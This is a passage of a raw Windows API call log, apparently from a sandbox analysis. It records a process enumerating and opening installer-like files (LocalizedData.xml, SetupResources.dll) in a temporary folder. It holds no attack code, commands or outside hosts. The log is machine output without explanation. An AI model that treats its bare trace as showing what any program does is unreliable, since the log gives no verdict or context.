lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.621] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.621] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.621] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.621] CloseHandle (hObject=0x41c) returned 1 [0061.621] AreFileApisANSI () returned 1 [0061.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0061.622] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.622] GetFileType (hFile=0x41c) returned 0x1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.622] CloseHandle (hObject=0x41c) returned 1 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.623] AreFileApisANSI () returned 1 [0061.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0061.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0061.623] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12)) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.623] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0061.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0061.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.624] AreFileApisANSI () returned 1 [0061.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.624] AreFileApisANSI () returned 1 [0061.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b68 [0061.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0061.624] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.625] GetFileType (hFile=0x41c) returned 0x1 [0061.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.625] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.625] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.625] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.625] CloseHandle (hObject=0x41c) returned 1 [0061.625] AreFileApisANSI () returned 1 [0061.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0061.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0061.625] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.626] GetFileType (hFile=0x41c) returned 0x1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.626] CloseHandle (hObject=0x41c) returned 1 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.627] AreFileApisANSI () returned 1 [0061.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0061.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0061.627] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558)) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.627] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46360, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䕘")) returned 0 [0061.627] FindClose (in: hFindFile=0x78210 | out: hFindFile=0x78210) returned 1 [0061.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0061.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0061.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.628] AreFileApisANSI () returned 1 [0061.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052", lpUsedDefaultChar=0x0) returned 27 [0061.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.628] AreFileApisANSI () returned 1 [0061.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78310 [0061.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78310, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052") returned 27 [0061.628] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052" (normalized: "c:\\588bce7c90097ed212\\2052"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.628] GetLastError () returned 0x5 [0061.628] GetLastError () returned 0x5 [0061.628] SetLastError (dwErrCode=0x5) [0061.628] GetLastError () returned 0x5 [0061.629] SetLastError (dwErrCode=0x5) [0061.629] GetLastError () returned 0x5 [0061.629] SetLastError (dwErrCode=0x5) [0061.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78310 | out: hHeap=0x20000) returned 1 [0061.629] AreFileApisANSI () returned 1 [0061.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78690 [0061.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78690, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052") returned 27 [0061.629] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052" (normalized: "c:\\588bce7c90097ed212\\2052"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.629] GetLastError () returned 0x5 [0061.629] GetLastError () returned 0x5 [0061.629] SetLastError (dwErrCode=0x5) [0061.629] GetLastError () returned 0x5 